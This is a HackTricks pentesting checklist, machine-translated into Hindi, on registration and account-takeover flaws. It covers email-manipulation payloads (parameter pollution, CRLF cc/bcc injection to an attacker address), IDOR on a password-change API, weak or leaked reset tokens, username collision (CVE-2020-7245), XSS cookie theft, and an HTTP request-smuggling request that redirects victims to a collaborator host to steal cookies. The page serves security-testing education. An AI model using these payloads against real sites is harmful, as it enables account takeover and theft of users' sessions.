hacktricks/pentesting-web/registration-vulnerabilities.md
Translator workflow 75e8745ba3 Translated to Hindi
2023-11-06 08:38:02 +00:00

15 KiB

पंजीकरण और Takeover संबंधी सुरक्षा दुरुपयोग

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

पंजीकरण Takeover

डुप्लिकेट पंजीकरण

  • मौजूदा उपयोगकर्ता नाम का उपयोग करके उत्पन्न करने का प्रयास करें
  • ईमेल को बदलने की जांच करें:
  • अपरकेस
  • +1@
  • ईमेल में कुछ कुछ जोड़ें
  • ईमेल नाम में विशेष वर्ण (%00, %09, %20)
  • ईमेल के बाद काले वर्ण डालें: test@test.com a
  • victim@gmail.com@attacker.com
  • victim@attacker.com@gmail.com

उपयोगकर्ता नाम जांच

जांचें कि क्या आप आवेदन के भीतर पहले से ही पंजीकृत उपयोगकर्ता नाम का पता लगा सकते हैं।

पासवर्ड नीति

उपयोगकर्ता बनाते समय पासवर्ड नीति की जांच करें (क्या आप कमजोर पासवर्ड का उपयोग कर सकते हैं)।
उस मामले में आप प्रमाणीकरण के लिए ब्रूटफोर्स कोशिश कर सकते हैं।

SQL Injection

इस पेज की जांच करें और पंजीकरण फॉर्म में SQL Injections के माध्यम से खाता ले जाने या जानकारी निकालने का प्रयास करने के लिए।

Oauth Takeovers

{% content-ref url="oauth-to-account-takeover.md" %} oauth-to-account-takeover.md {% endcontent-ref %}

SAML संकट

{% content-ref url="saml-attacks/" %} saml-attacks {% endcontent-ref %}

ईमेल बदलें

पंजीकृत होने पर ईमेल बदलने का प्रयास करें और जांचें कि क्या यह परिवर्तन सही ढंग से सत्यापित हो रहा है या क्या इसे विचारहीन ईमेल पर बदल सकते हैं।

अधिक जांचें

  • डिस्पोजेबल ईमेल का उपयोग कर सकते हैं या नहीं जांचें
  • लंबा पासवर्ड (>200) द्वारा DoS हो सकता है
  • खाता निर्माण पर रेट सीमाएं जांचें
  • उपयोगकर्ता नाम@burp_collab.net का उपयोग करें और कॉलबैक का विश्लेषण करें
# parameter pollution
email=victim@mail.com&email=hacker@mail.com

# array of emails
{"email":["victim@mail.com","hacker@mail.com"]}

# carbon copy
email=victim@mail.com%0A%0Dcc:hacker@mail.com
email=victim@mail.com%0A%0Dbcc:hacker@mail.com

# separator
email=victim@mail.com,hacker@mail.com
email=victim@mail.com%20hacker@mail.com
email=victim@mail.com|hacker@mail.com

API पैरामीटर पर IDOR

  1. हमलावर को अपने खाते से लॉगिन करना होगा और पासवर्ड बदलें फ़ीचर पर जाना होगा।
  2. Burp Suite शुरू करें और अनुरोध को रोकें
  3. इसे repeater टैब में भेजें और पैरामीटर संपादित करें: उपयोगकर्ता आईडी/ईमेल
    powershell POST /api/changepass [...] ("form": {"email":"victim@email.com","password":"securepwd"})

कमजोर पासवर्ड रीसेट टोकन

पासवर्ड रीसेट टोकन को हर बार यादृच्छिक रूप से उत्पन्न और अद्वितीय होना चाहिए।
यह निर्धारित करने की कोशिश करें कि क्या टोकन समाप्त होता है या क्या यह हमेशा समान होता है, कुछ मामलों में उत्पन्नन एल्गोरिदम कमजोर होता है और इसे अनुमान लगाया जा सकता है। निम्नलिखित चर प्रायोगिक हो सकते हैं।

  • टाइमस्टैम्प
  • उपयोगकर्ता की आईडी
  • उपयोगकर्ता का ईमेल
  • पहला नाम और अंतिम नाम
  • जन्मतिथि
  • गणितीय
  • केवल संख्या
  • छोटा टोकन अनुक्रम (अक्षरों के बीच वाले वर्ण [A-Z, a-z, 0-9])
  • टोकन पुन: प्रयोग
  • टोकन समाप्ति तिथि

पासवर्ड रीसेट टोकन लीक

  1. विशेष ईमेल के लिए API/UI का उपयोग करके पासवर्ड रीसेट अनुरोध को ट्रिगर करें, उदा।: test@mail.com
  2. सर्वर के प्रतिक्रिया की जांच करें और resetToken के लिए जांचें
  3. फिर उपयोग करें टोकन को एक URL में जैसे https://example.com/v3/user/password/reset?resetToken=[THE_RESET_TOKEN]&email=[THE_MAIL]

उपयोगकर्ता नाम संघर्ष के माध्यम से पासवर्ड रीसेट

  1. विक्टिम के उपयोगकर्ता नाम के साथ एक उपयोगकर्ता नाम पर सिस्टम में पंजीकरण करें, लेकिन उपयोगकर्ता नाम के पहले और/या बाद में सफेद जगह डालें। उदा।: "admin "
  2. अपने धोखाधड़ीपूर्ण उपयोगकर्ता नाम के साथ पासवर्ड रीसेट का अनुरोध करें।
  3. अपने ईमेल पर भेजे गए टोकन का उपयोग करें और विक्टिम पासवर्ड रीसेट करें।
  4. नए पासवर्ड के साथ विक्टिम खाते में कनेक्ट करें।

CTFd प्लेटफ़ॉर्म इस हमले के प्रति संक्रमित थी।
देखें: CVE-2020-7245

क्रॉस साइट स्क्रिप्टिंग के माध्यम से खाता हथियाना

  1. अनुप्रयोग या उपयोगकर्ता के कुकीज़ को प्रभावित करने वाले एक सबडोमेन में एक XSS ढूंढें, यदि कुकीज़ माता डोमेन के लिए स्कोप किए गए हैं: *.domain.com
  2. मौजूदा सत्र कुकी को लीक करें
  3. कुकी का उपयोग करके उपयोगकर्ता के रूप में प्रमाणित करें

HTTP अनुरोध स्मगलिंग के माध्यम से खाता हथियाना

1. टाइप को खोजने के लिए smuggler का उपयोग करें HTTP अनुरोध स्मगलिंग का (CL, TE, CL.TE)
powershell git clone https://github.com/defparam/smuggler.git cd smuggler python3 smuggler.py -h
2. एक अनुरोध तैयार करें जिसमें निम्नलिखित डेटा के साथ POST / HTTP/1.1 को अधिलेखित किया जाएगा:
GET http://something.burpcollaborator.net HTTP/1.1 X: लक्ष्य यह है कि पीड़ितों को burpcollab पर ओपन रीडायरेक्ट किया जाए और उनकी कुकीज़ चुराई जाएं
3. अंतिम अनुरोध निम्नलिखित की तरह दिख सकता है

GET / HTTP/1.1
Transfer-Encoding: chunked
Host: something.com
User-Agent: Smuggler/v1.0
Content-Length: 83
0

GET http://something.burpcollaborator.net  HTTP/1.1
X: X

Hackerone रिपोर्ट इस बग का उपयोग करके हैक करने की बात कर रही है
* https://hackerone.com/reports/737140
* https://hackerone.com/reports/771666

CSRF के माध्यम से खाता हासिल करना

  1. CSRF के लिए पेलोड बनाएं, उदा। "पासवर्ड बदलने के लिए ऑटो सबमिट के साथ HTML फॉर्म"
  2. पेलोड भेजें

JWT के माध्यम से खाता हासिल करना

JSON Web Token का उपयोग उपयोगकर्ता को प्रमाणित करने के लिए किया जा सकता है।

  • दूसरे उपयोगकर्ता आईडी / ईमेल के साथ JWT संपादित करें
  • कमजोर JWT हस्ताक्षर की जांच करें

{% content-ref url="hacking-jwt-json-web-tokens.md" %} hacking-jwt-json-web-tokens.md {% endcontent-ref %}

संदर्भ

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥